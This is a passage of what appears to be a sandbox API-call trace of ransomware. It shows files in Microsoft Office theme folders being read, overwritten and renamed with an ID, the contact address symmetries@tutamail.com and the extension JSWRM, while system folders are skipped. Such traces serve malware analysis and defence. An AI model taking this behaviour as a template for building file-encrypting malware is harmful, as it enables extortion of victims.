| out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.564] CloseHandle (hObject=0x314) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0100.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0100.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0100.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0100.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.565] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Median.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\median.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Median.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\median.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0100.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0100.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0100.566] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1139e160, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ee, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Office 2007 - 2010.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2=".") returned 1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="..") returned 1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="...") returned 1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="windows") returned -1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="recovery") returned -1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="perflogs") returned -1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="documents and settings") returned 1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="system volume information") returned -1 [0100.566] lstrcmpiW (lpString1="Office 2007 - 2010.xml", lpString2="msocache") returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office 2007 - 2010.xml", lpUsedDefaultChar=0x0) returned 22 [0100.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0100.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office 2007 - 2010.xml", cchWideChar=22, lpMultiByteStr=0x241100, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office 2007 - 2010.xml", lpUsedDefaultChar=0x0) returned 22 [0100.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0100.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0100.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Office 2007 - 2010.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\office 2007 - 2010.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=750) returned 1 [0100.567] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.567] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.569] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.569] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.570] CloseHandle (hObject=0x314) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0100.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0100.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0100.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0100.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0100.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.570] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Office 2007 - 2010.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\office 2007 - 2010.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Office 2007 - 2010.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\office 2007 - 2010.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0100.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0100.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0100.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0100.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.571] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1139e160, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Orange Red.xml", cAlternateFileName="ORANGE~1.XML")) returned 1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2=".") returned 1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="..") returned 1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="...") returned 1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="windows") returned -1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="recovery") returned -1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="perflogs") returned -1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="documents and settings") returned 1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="system volume information") returned -1 [0100.571] lstrcmpiW (lpString1="Orange Red.xml", lpString2="msocache") returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Red.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Red.xml", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange Red.xml", lpUsedDefaultChar=0x0) returned 14 [0100.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Red.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange Red.xml", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange Red.xml", lpUsedDefaultChar=0x0) returned 14 [0100.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0100.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0100.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange Red.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange red.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.573] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=744) returned 1 [0100.573] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e0) returned 0x20b1f8 [0100.573] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2e0, lpOverlapped=0x0) returned 1 [0100.593] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.593] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2e0, lpOverlapped=0x0) returned 1 [0100.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.593] CloseHandle (hObject=0x314) returned 1 [0100.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0100.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0100.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0100.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0100.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0100.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.594] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange Red.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange red.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange Red.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange red.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0100.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.595] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11377f40, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1139e160, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Orange.xml", cAlternateFileName="")) returned 1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2=".") returned 1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="..") returned 1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="...") returned 1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="windows") returned -1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="recovery") returned -1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="perflogs") returned -1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="documents and settings") returned 1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="$RECYCLE.BIN") returned 1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="system volume information") returned -1 [0100.595] lstrcmpiW (lpString1="Orange.xml", lpString2="msocache") returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange.xml", lpUsedDefaultChar=0x0) returned 10 [0100.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0100.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Orange.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Orange.xml", lpUsedDefaultChar=0x0) returned 10 [0100.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0100.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0100.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0100.595] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Colors\\Orange.xml" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme colors\\orange.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.596] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=720) returned 1 [0100.596] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d0) returned 0x20b1f8 [0100.596] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2d0, lpOverlapped=0x0) returned 1 [0100.597] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.597] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2d0, lpOverlapped=0x0) returned 1 [0100.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0100.597] CloseHandle (hObject=0x314) returned 1 [0100.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0100.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0100.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: 